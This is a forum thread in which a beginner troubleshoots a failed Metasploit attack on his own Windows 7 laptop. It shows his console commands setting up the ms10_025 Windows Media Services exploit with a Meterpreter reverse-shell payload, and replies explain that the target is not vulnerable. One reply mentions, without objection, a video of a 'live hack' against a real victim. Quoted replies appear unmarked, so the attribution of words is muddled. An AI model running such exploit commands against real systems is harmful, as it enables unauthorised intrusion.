Metasploit error

[centip3de]

So I just started using Metasploit today, and set-up my laptop (Running Win 7) to test some exploits, for learning purposes of course. I went over and disabled all of the firewalls (Including Windows Firewall) and AV's I have on that computer. I then went over to my desktop (also running Win7) and started using Metasploit. But when I tried to run an exploit, it says "Exploit Exception: The connection was refused by the remote host (192.168.33.1:1755)". Thinking I missed an AV or firewall I went over and checked, but it appears that all are disabled... I'm perplexed to say the least. Here's exactly what I did in Metasploit:

Code: Select all

msf > use windows/mmsp/ms10_025_wmss_connect_funnel
msf exploit(ms10_25_wmss_connect_funnel) > set RHOST 192.168.33.115
RHOST => 192.168.33.115
msf exploit(ms10_25_wmss_connect_funnel) > set LHOST 192.168.33.101
LHOST => 192.168.33.101
msf exploit(ms10_25_wmss_connect_funnel) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms10_25_wmss_connect_funnel) > exploit
[*] Started reverse handler on 192.168.33.101:4444
[-] Exploit exception: The connection was refused by the remote host (192.168.33.115:1755)
[*]Exploit compleated: No session was started

Thanks for any and all help!

[Goatboy]

Well I think the most obvious problem is that you're using an exploit on a product that is not vulnerable. "ms10_025_wmss_connect_funnel" is an exploit written in Ruby that takes advantage of a vulnerability in Windows Media Services. This is included in Windows 2000 Server, but is not enabled by default. Windows 7 != Windows 2000 Server.

http://packetstormsecurity.org/files/favorite/88649/

[centip3de]

Well I think the most obvious problem is that you're using an exploit on a product that is not vulnerable. "ms10_025_wmss_connect_funnel" is an exploit written in Ruby that takes advantage of a vulnerability in Windows Media Services. This is included in Windows 2000 Server, but is not enabled by default. Windows 7 != Windows 2000 Server.

http://packetstormsecurity.org/files/favorite/88649/

...../facepalm

[jgreen45]

Well I think the most obvious problem is that you're using an exploit on a product that is not vulnerable. "ms10_025_wmss_connect_funnel" is an exploit written in Ruby that takes advantage of a vulnerability in Windows Media Services. This is included in Windows 2000 Server, but is not enabled by default. Windows 7 != Windows 2000 Server.

http://packetstormsecurity.org/files/favorite/88649/

I remember reading a HTS post by someone linking to a black hat live hacking of a windows 7 box, (or what nmap suggested the box was) blackhat2012 used the ms10_025_wmss_connect_funnel exploit to connect and shut-down the victims computer, so I think that might be the place where centip3de may have gotten the idea from. Personally i am perplexed why the youtube video maker decided to used this exploit as it only works on Windows 2000.

The video

[Goatboy]

That was a live hack, meaning there was an actual victim on the other computer. This person probably enabled WMS on his machine. I'm guessing centip3de did not.

[centip3de]

That was a live hack, meaning there was an actual victim on the other computer. This person probably enabled WMS on his machine. I'm guessing centip3de did not.

Actually, we had the same process running... But I think my Cisco has "port protected up", so I'll have to change that.